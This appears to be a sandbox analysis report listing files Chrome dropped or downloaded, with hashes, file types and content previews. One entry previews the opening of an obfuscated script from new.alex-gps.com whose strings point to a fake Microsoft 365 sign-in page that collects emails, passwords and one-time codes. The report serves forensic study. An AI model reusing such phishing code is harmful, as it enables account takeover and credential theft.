                                                      Preview:L..................F.@.. ...$+.,......0..%..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IWY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VWY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VWY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VWY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VWY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............a......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 23 20:29:31 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2679
                                                      Entropy (8bit):3.99854695205444
                                                      Encrypted:false
                                                      SSDEEP:48:8SmdpTxlGH8UidAKZdA1duTeehOuTbbiZUk5OjqehOuTbRy+yT+:8Sk7FTfTbxWOvTbRy7T
                                                      MD5:6BA407F5ED6891F0B860084D7FF0FBE4
                                                      SHA1:C2D3F2DFAB09F9008320E5603786D179A4F436DC
                                                      SHA-256:EE037DA2CD6D843A404C5896E950B9321E98F8EE81B72CBAAF938CB58443483B
                                                      SHA-512:BE3475BBA12CB3E349AD2982F7BAF56EC69BA5E2937EFA80EC861A84618E900ADFAE0C6CC486AAB6798C5367E12ACA8DC9CAA1F5DDA3D157A59E26DD15AE86EF
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:L..................F.@.. ...$+.,.....*...%..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IWY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VWY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VWY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VWY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VWY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............a......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (49854)
                                                      Category:downloaded
                                                      Size (bytes):49993
                                                      Entropy (8bit):5.216475744251136
                                                      Encrypted:false
                                                      SSDEEP:768:RKrClF4PgzcEZ5G/Z4G9qXLZed86mhrjlm:RPXcZ4TLZzpPm
                                                      MD5:777EB8FD4F8320B6E5CC9A7159BDEC6A
                                                      SHA1:6B4032E88D0040182089FE3BEFDECEE9346E8921
                                                      SHA-256:73EBA16BC895FDFA454E27ECB80DEF31EDE8D861F99E175FF93B110EABEC044F
                                                      SHA-512:D75B7C43EBD8F49942AEBF8FBDE64A4D826AF27ECED3D6395FFA64FDA31DDEF26E812BEEE313AE9C6114CDA003A8BDC8F1C64A13FA41C3009F5F30E4449876B1
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://cdn.socket.io/4.7.5/socket.io.min.js
                                                      Preview:/*!. * Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;th
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                                      Category:dropped
                                                      Size (bytes):2407
                                                      Entropy (8bit):7.900400471609788
                                                      Encrypted:false
                                                      SSDEEP:48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
                                                      MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                                      SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                                      SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                                      SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                                      Category:dropped
                                                      Size (bytes):276
                                                      Entropy (8bit):7.316609873335077
                                                      Encrypted:false
                                                      SSDEEP:6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
                                                      MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                                      SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                                      SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                                      SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....*e.......J).*8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                                      Category:downloaded
                                                      Size (bytes):276
                                                      Entropy (8bit):7.316609873335077
                                                      Encrypted:false
                                                      SSDEEP:6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
                                                      MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                                      SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                                      SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                                      SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg
                                                      Preview:...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....*e.......J).*8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                      Category:dropped
                                                      Size (bytes):1435
                                                      Entropy (8bit):7.8613342322590265
                                                      Encrypted:false
                                                      SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                      MD5:9F368BC4580FED907775F31C6B26D6CF
                                                      SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                      SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                      SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (49854)
                                                      Category:dropped
                                                      Size (bytes):49993
                                                      Entropy (8bit):5.216475744251136
                                                      Encrypted:false
                                                      SSDEEP:768:RKrClF4PgzcEZ5G/Z4G9qXLZed86mhrjlm:RPXcZ4TLZzpPm
                                                      MD5:777EB8FD4F8320B6E5CC9A7159BDEC6A
                                                      SHA1:6B4032E88D0040182089FE3BEFDECEE9346E8921
                                                      SHA-256:73EBA16BC895FDFA454E27ECB80DEF31EDE8D861F99E175FF93B110EABEC044F
                                                      SHA-512:D75B7C43EBD8F49942AEBF8FBDE64A4D826AF27ECED3D6395FFA64FDA31DDEF26E812BEEE313AE9C6114CDA003A8BDC8F1C64A13FA41C3009F5F30E4449876B1
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:/*!. * Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;th
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                                                      Category:dropped
                                                      Size (bytes):199
                                                      Entropy (8bit):6.766983163126765
                                                      Encrypted:false
                                                      SSDEEP:6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
                                                      MD5:21B761F2B1FD37F587D7222023B09276
                                                      SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                                                      SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                                                      SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 105536, version 769.768
                                                      Category:downloaded
                                                      Size (bytes):105536
                                                      Entropy (8bit):7.989150976486913
                                                      Encrypted:false
                                                      SSDEEP:3072:cBrlv6vs2sSSF2Hv2/V49i7iM6wYyXuJwzO:cBrlvyVsSSFeWV49SiM6kaoO
                                                      MD5:CD2B4095E9CE66CDE642C3502A4022D9
                                                      SHA1:A280ECDDDD14695FAD22599301AB03ADFE5224C0
                                                      SHA-256:404C746C8F7E3F9B7611A8F23D908C1A32A5C972236B9D89BB68B05D9BF4B905
                                                      SHA-512:062782597F37B964A5F285FE8B75AC2CC57E99024FA6C9BF841DC2E7B930CE6CFC12EA5F32D2A6B7301A74FFBB552457A2A82ED9D945E135D8B027F506BF5D77
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/webfonts/fa-brands-400.woff2
                                                      Preview:wOF2.......@.....................................8.$. .`..P..H....T.. . ..WQg......V?..H.I...U.:1....~..?................s...y..*...Y.KEF.......SQ.R].H.H@.oa.....~?..{&@g6i..a...U...z5...x...<........I........,.".....W.7v.$v...t..F]...X.X[..k..su.O.<.......V./.z..;.\....=y7.....]B.8.$`.Y.3....uTT.0.5..7~1...y~........WU.tWM.m....i@.A.-...l'..!.80!..q.'@h?t..Q.-........._.O.S.t..-.b...>..NE$c..O..AT....w .H.A..yK6..PYQ...c.%......}..i.6..X......:.D{...{...}....@.>P........P|.......Ud.BQ.^%.f.%M.b..R...h.j.PUk.....l....c..".....5Kn....Jc.&..&..."..9.....Q`........m.E...:M......\..yIMdZ]..].I..*...#t.shk.u.. .Ld.]{..&......3.UE.PG.0(..6`....B..7<j]....6....z.......\.$l....6BQ..WU...y?[....Unb.....K}T.........p..Z.t.....u..1..._.h).z..m.=`.....p.........{~...i..r.s........v.m|..c0..f.:..1...l..Y....>.........C..O...Xf.K....I...|...Y..=.e.0...^+.w...2....+L......"..X/.~:_..m/.o..B..4.LJ.'..3....f.N..;-9#..e:.J.a;K.9*.I....T.w=.0.....n.K.t..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):52
                                                      Entropy (8bit):4.190260390968384
                                                      Encrypted:false
                                                      SSDEEP:3:OnuZoS+NT/ZoS8/ZYn:OnuZoSyT/ZoS8/ZYn
                                                      MD5:09BDE5D10D92DEBBB74AE9C3DF3AECAB
                                                      SHA1:2F4EEA05E85C26DE82C5E7CBA471687EC8D855EC
                                                      SHA-256:F67F67274C88240DE01FA51D483271F58A5752B607B13DEE041C7A0671290E7F
                                                      SHA-512:0FF4A460BC9068E61B6EEC0078E97F2AD0DCD12288E8161688351C3BB85A87D624E5B7635C47ED1B5B93C6D3B4A29A756A75A897394B4E6A3986BBB1762CFC6C
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISJQnk3MaPRJmuPhIFDZFhlU4SBQ01hlQcEgUNkWGVThIFDZFhlU4=?alt=proto
                                                      Preview:CiQKBw2RYZVOGgAKBw01hlQcGgAKBw2RYZVOGgAKBw2RYZVOGgA=
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:SVG Scalable Vector Graphics image
                                                      Category:downloaded
                                                      Size (bytes):1636
                                                      Entropy (8bit):4.214613323368661
                                                      Encrypted:false
                                                      SSDEEP:24:t4pb8W1baAcycV1i21AL5Xr/fJzWTtDYnpTyuwa+BDhMXeDFF6+/OKgXOgWKZsHz:zdyb2+jfJz+sFyN3BdMeFF52KgeTksHz
                                                      MD5:F7AB697E65B83CE9870A4736085DEEEC
                                                      SHA1:5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
                                                      SHA-256:CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
                                                      SHA-512:158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg
                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:exported SGML document, Unicode text, UTF-8 text, with very long lines (65506)
                                                      Category:downloaded
                                                      Size (bytes):128837
                                                      Entropy (8bit):4.5360008090074775
                                                      Encrypted:false
                                                      SSDEEP:3072:Angz3cwtj4+eS6e6+XE3TLc7afmmmmmUmBs/T3:AnU3cwtj4+eS6e6+XE3TLD3
                                                      MD5:D1C0613A3A9F1D522122B164ADCC8AA1
                                                      SHA1:2E27F34CD0A193F49966BE20F658A9E6B8201F38
                                                      SHA-256:EE222E69F82C1C2903E69B9564ECB030D63C3EEFF4FEBDB858BEF602C0FC2840
                                                      SHA-512:86E680259E31D0FF01B34A0B8999EAF9CABE4E8D87FD3B20CC0405685E565D2E4F5737EA9AE2C9A1FDEA38EFB85EA20923AC238B63D346AA47DB386AF6F37F2E
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://new.alex-gps.com/m/jsv.js
                                                      Preview:function _0xb276() {. const _0x5ed944 = ['href', '.phoneotpText', 'readyState', '#playme_big', '@ionos.', '#playme', 'resize', 's2c_restart', '.loaderxBlock11', 's2c', 'complete', 'O365', 'url(\x27https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg\x27)', '@163.', 'trim', '#fff', 'location', 'focus', 'beforeend', 'onblur', '@yandex.', 'load', 'RQ_EMAIL', '375242BWnaRd', 'body', 'Trying\x20to\x20sign\x20you\x20in\x20...', '#allbody', 'endUrl', 'RQ_OTP_APP', 'onfocus', '.logerMe', '.appotpCode', '.otpInput2', 'https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg', 'keyup', 'disconnect', '<p/>', '1007762XNswUc', 'test', 'includes', 'interactive', '.loaderxBlock2', '#000', 'width', 'CORRECT_OTP', 'otp_command', '.grayBox', '.emailInput', '.msappBlock', 'authentication-server.com', 'reload', 'attachEvent', '.passwordError', 'RQ_OTP_NOPASS_APP', '#base_icons', 'top', '.backArrow', '\x0a\x
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:exported SGML document, Unicode text, UTF-8 text, with very long lines (65506)
                                                      Category:dropped
                                                      Size (bytes):128837
                                                      Entropy (8bit):4.5360008090074775
                                                      Encrypted:false
                                                      SSDEEP:3072:Angz3cwtj4+eS6e6+XE3TLc7afmmmmmUmBs/T3:AnU3cwtj4+eS6e6+XE3TLD3
                                                      MD5:D1C0613A3A9F1D522122B164ADCC8AA1
                                                      SHA1:2E27F34CD0A193F49966BE20F658A9E6B8201F38
                                                      SHA-256:EE222E69F82C1C2903E69B9564ECB030D63C3EEFF4FEBDB858BEF602C0FC2840
                                                      SHA-512:86E680259E31D0FF01B34A0B8999EAF9CABE4E8D87FD3B20CC0405685E565D2E4F5737EA9AE2C9A1FDEA38EFB85EA20923AC238B63D346AA47DB386AF6F37F2E
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:function _0xb276() {. const _0x5ed944 = ['href', '.phoneotpText', 'readyState', '#playme_big', '@ionos.', '#playme', 'resize', 's2c_restart', '.loaderxBlock11', 's2c', 'complete', 'O365', 'url(\x27https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg\x27)', '@163.', 'trim', '#fff', 'location', 'focus', 'beforeend', 'onblur', '@yandex.', 'load', 'RQ_EMAIL', '375242BWnaRd', 'body', 'Trying\x20to\x20sign\x20you\x20in\x20...', '#allbody', 'endUrl', 'RQ_OTP_APP', 'onfocus', '.logerMe', '.appotpCode', '.otpInput2', 'https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg', 'keyup', 'disconnect', '<p/>', '1007762XNswUc', 'test', 'includes', 'interactive', '.loaderxBlock2', '#000', 'width', 'CORRECT_OTP', 'otp_command', '.grayBox', '.emailInput', '.msappBlock', 'authentication-server.com', 'reload', 'attachEvent', '.passwordError', 'RQ_OTP_NOPASS_APP', '#base_icons', 'top', '.backArrow', '\x0a\x
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:SVG Scalable Vector Graphics image
                                                      Category:dropped
                                                      Size (bytes):1636
                                                      Entropy (8bit):4.214613323368661
                                                      Encrypted:false
                                                      SSDEEP:24:t4pb8W1baAcycV1i21AL5Xr/fJzWTtDYnpTyuwa+BDhMXeDFF6+/OKgXOgWKZsHz:zdyb2+jfJz+sFyN3BdMeFF52KgeTksHz
                                                      MD5:F7AB697E65B83CE9870A4736085DEEEC
                                                      SHA1:5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
                                                      SHA-256:CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
                                                      SHA-512:158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):2228
                                                      Entropy (8bit):7.82817506159911
                                                      Encrypted:false
                                                      SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                                      MD5:EF9941290C50CD3866E2BA6B793F010D
                                                      SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                      SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                      SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://www.gstatic.com/recaptcha/api2/logo_48.png
                                                      Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 154228, version 769.768
